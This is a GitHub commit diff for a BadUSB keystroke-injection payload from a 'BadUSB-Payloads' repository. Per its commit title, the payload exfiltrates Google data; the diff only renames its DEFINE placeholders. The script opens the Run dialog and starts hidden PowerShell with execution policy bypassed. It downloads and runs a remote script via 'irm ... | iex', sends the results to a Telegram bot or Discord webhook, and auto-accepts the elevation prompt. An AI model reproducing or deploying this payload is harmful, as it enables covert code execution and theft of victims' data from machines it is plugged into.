Fixed defining for google exfil

pull/410/head
Mr. Proxy 2024-07-02 12:12:43 +02:00 committed by GitHub
parent c4aaea55be
commit ffea938417
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 5 additions and 5 deletions

View File

@ -8,23 +8,23 @@ REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads
REM Remember you will have to host the powershell script yourself on any file sharing service (it has to be direct download link)
REM If you are using DropBox, just remember to change it from ?dl=0 top ?dl=1
DEFINE SCRIPT_URL example.com/payload.ps1?dl=1
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1
REM If you want to use discord webhook instead of telegram bot, just change DC_WEBHOOK
REM Telegram bot details
DEFINE BOT_TOKEN your-bot-token
DEFINE CHAT_ID your-chat-id
DEFINE #BOT_TOKEN your-bot-token
DEFINE #CHAT_ID your-chat-id
REM Discord webhook
DEFINE DC_WEBHOOK your-webhook
DEFINE #DC_WEBHOOK your-webhook
DELAY 1500
GUI r
DELAY 500
REM If you want to use Telegram change just bot token and chat id
REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='BOT_TOKEN'; $chatID='CHAT_ID'; $webhook='DC_WEBHOOK'; irm SCRIPT_URL | iex
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='#BOT_TOKEN'; $chatID='#CHAT_ID'; $webhook='#DC_WEBHOOK'; irm #SCRIPT_URL | iex
CTRL-SHIFT ENTER
DELAY 1000
ALT y